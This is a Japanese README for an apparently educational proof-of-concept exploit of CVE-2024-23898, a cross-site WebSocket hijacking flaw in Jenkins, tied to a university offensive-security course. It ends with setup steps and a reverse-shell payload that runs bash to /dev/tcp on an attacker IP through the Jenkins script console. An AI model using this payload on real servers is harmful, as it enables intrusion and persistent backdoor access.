
CVE-2024-23898 用のクロスサイト WebSocket ハイジャックの概念実証エクスプロイト — Jenkins バージョン 2.217〜2.441 に影響する脆弱性。 カーネギーメロン大学の Hacking & Offensive Security コースにおける教育目的で使用。
CVE-2024-23898(Jenkins バージョン 2.217-2.441 に影響を与える脆弱性)に対する、クロスサイト WebSocket ハイジャックの概念実証(PoC)エクスプロイトです。
このエクスプロイトは、Jenkins 制御サーバーにリモートアクセスしてコマンドを発行するために使用できる Jenkins CLI を標的としています。このエクスプロイトにより、リモート攻撃者は、管理者がターゲットの Jenkins 制御サーバーにログインした状態で悪意のあるサイトを訪問するよう誘導された場合、Jenkins 制御サーバーへのアクセスを取得し、永続的なバックドアを確立することができます。
このコードは教育目的のみを意図しており、カーネギーメロン大学の Hacking & Offensive Security コースでの使用にのみ限定されています。このコードを武器化したり、マルウェアを作成するために使用したりしてはなりません。著者らはそのような試みを明確に非難します。
nc -l <port_num> を使用して netcat リスナーを起動します(<port_num> は未使用のポート番号に置き換えてください)ipconfig getifaddr en0 コマンドで確認できます[http://localhost:8080/script](http://localhost:8080/script) に移動します。まだログインしていない場合は、管理者アカウントでログインします['bash', '-c', 'bash -i >& /dev/tcp/<attacker_ip>/<port_num> 0>&1'].execute()